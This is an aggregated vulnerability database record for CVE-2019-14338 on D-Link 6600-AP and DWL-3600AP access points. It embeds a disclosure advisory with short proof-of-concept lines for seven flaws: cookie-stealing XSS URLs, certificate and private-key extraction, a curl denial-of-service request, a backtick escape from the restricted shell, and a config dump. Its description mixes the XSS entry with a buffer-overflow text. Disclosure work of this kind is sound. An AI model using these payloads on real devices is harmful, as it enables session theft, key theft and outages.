ID

VAR-201908-0916


CVE

CVE-2019-14338


TITLE

D-Link 6600-AP and DWL-3600AP Device cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2019-007263

DESCRIPTION

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP devices contain a cross-site scripting vulnerability. Information may be obtained and information may be altered.

The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications.

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14).

D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019

Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product

D-Link 6600-AP, DWL-3600AP
+ Vulnerability number 2 affects also DWL-8610AP

### Firmware version

4.2.0.14 Revision Ax date: 21/03/2019

### Last version available

https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier

WLAN-EAP

### Hardware Version

A2

### Manufacturer

D-LINK

## Product Description

The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network.

Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
4. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated Certificate and RSA Private Key extraction through http command

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept

http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted

### 3. Pre-authenticated Denial of service leading to the reboot of the AP

#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof-of concept

kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### 4. Escape shell in the restricted command line interface

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
    [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
    [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL

Retrieve files via HTTP or FTP

Options:
    -s        Spider mode - only check file existence
    -c        Continue retrieval of aborted transfer
    -q        Quiet
    -P DIR    Save to DIR (default .)
    -T SEC    Network read timeout is SEC seconds
    -O FILE   Save to FILE ('-' for stdout)
    -U STR    Use STR for User-Agent header
    -Y        Use proxy ('on' or 'off')

DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14335
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept

root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help

## Report Timeline

22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates

ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip

## About me - pwn.sandstorm@gmail.com

#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources

Trust: 2.34

sources: NVD: CVE-2019-14338 // JVNDB: JVNDB-2019-007263 // CNVD: CNVD-2019-29147 // VULHUB: VHN-146274 // PACKETSTORM: 153840

IOT TAXONOMY

category: ['IoT'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2019-29147

AFFECTED PRODUCTS

vendor: dlink, model: 6600-ap, scope: eq, version: 4.2.0.14

Trust: 1.0

vendor: dlink, model: dwl-3600ap, scope: eq, version: 4.2.0.14

Trust: 1.0

vendor: d link, model: d-link 6600-ap, scope: eq, version: 4.2.0.14

Trust: 0.8

vendor: d link, model: dwl-3600ap, scope: eq, version: 4.2.0.14

Trust: 0.8

vendor: d link, model: 6600-ap, scope: -, version: -

Trust: 0.6

vendor: d link, model: dwl-3600ap ax devices, scope: eq, version: 4.2.0.1421/03/2019

Trust: 0.6

sources: CNVD: CNVD-2019-29147 // JVNDB: JVNDB-2019-007263 // NVD: CVE-2019-14338

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-14338
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-14338
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2019-29147
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201907-1626
value: MEDIUM

Trust: 0.6

VULHUB: VHN-146274
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-14338
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2019-29147
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-146274
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-14338
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.1

Trust: 1.0

NVD: CVE-2019-14338
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2019-29147 // VULHUB: VHN-146274 // JVNDB: JVNDB-2019-007263 // CNNVD: CNNVD-201907-1626 // NVD: CVE-2019-14338

PROBLEMTYPE DATA

problemtype: CWE-79

Trust: 1.9

sources: VULHUB: VHN-146274 // JVNDB: JVNDB-2019-007263 // NVD: CVE-2019-14338

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201907-1626

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201907-1626

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-007263

PATCH

title: Security Advisory, url: https://us.dlink.com/en/security-advisory

Trust: 0.8

title: Security Bulletin, url: https://www.dlink.com/en/security-bulletin

Trust: 0.8

title: Patch for D-Link 6600-AP and DWL-3600AP Buffer Overflow Vulnerabilities, url: https://www.cnvd.org.cn/patchInfo/show/177593

Trust: 0.6

title: D-Link 6600-AP and DWL-3600AP Buffer error vulnerability fix, url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95738

Trust: 0.6

sources: CNVD: CNVD-2019-29147 // JVNDB: JVNDB-2019-007263 // CNNVD: CNNVD-201907-1626

EXTERNAL IDS

db: NVD, id: CVE-2019-14338

Trust: 3.2

db: PACKETSTORM, id: 153840

Trust: 3.2

db: JVNDB, id: JVNDB-2019-007263

Trust: 0.8

db: CNNVD, id: CNNVD-201907-1626

Trust: 0.7

db: CNVD, id: CNVD-2019-29147

Trust: 0.6

db: VULHUB, id: VHN-146274

Trust: 0.1

sources: CNVD: CNVD-2019-29147 // VULHUB: VHN-146274 // JVNDB: JVNDB-2019-007263 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1626 // NVD: CVE-2019-14338

REFERENCES

url:http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html

Trust: 3.1

url:https://us.dlink.com/en/security-advisory

Trust: 1.7

url:https://www.dlink.com/en/security-bulletin

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2019-14338

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14338

Trust: 0.8

url:https://nvd.nist.gov/vuln/detail/cve-2019-14336

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14332

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14335

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14333

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=%s

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=+guest<script>alert('pwned')</script>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14337

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14334

Trust: 0.1

url:http://10.90.90.91/sslcert-get.cgi?

Trust: 0.1

url:https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=

Trust: 0.1

sources: CNVD: CNVD-2019-29147 // VULHUB: VHN-146274 // JVNDB: JVNDB-2019-007263 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1626 // NVD: CVE-2019-14338

CREDITS

Sandstorm Security

Trust: 0.7

sources: PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1626

SOURCES

db: CNVD, id: CNVD-2019-29147
db: VULHUB, id: VHN-146274
db: JVNDB, id: JVNDB-2019-007263
db: PACKETSTORM, id: 153840
db: CNNVD, id: CNNVD-201907-1626
db: NVD, id: CVE-2019-14338

LAST UPDATE DATE

2024-11-23T21:52:00.589000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2019-29147, date: 2019-08-28T00:00:00
db: VULHUB, id: VHN-146274, date: 2019-08-05T00:00:00
db: JVNDB, id: JVNDB-2019-007263, date: 2019-08-06T00:00:00
db: CNNVD, id: CNNVD-201907-1626, date: 2019-08-07T00:00:00
db: NVD, id: CVE-2019-14338, date: 2024-11-21T04:26:32.490

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2019-29147, date: 2019-08-28T00:00:00
db: VULHUB, id: VHN-146274, date: 2019-08-01T00:00:00
db: JVNDB, id: JVNDB-2019-007263, date: 2019-08-06T00:00:00
db: PACKETSTORM, id: 153840, date: 2019-07-31T19:01:29
db: CNNVD, id: CNNVD-201907-1626, date: 2019-07-31T00:00:00
db: NVD, id: CVE-2019-14338, date: 2019-08-01T13:15:14.337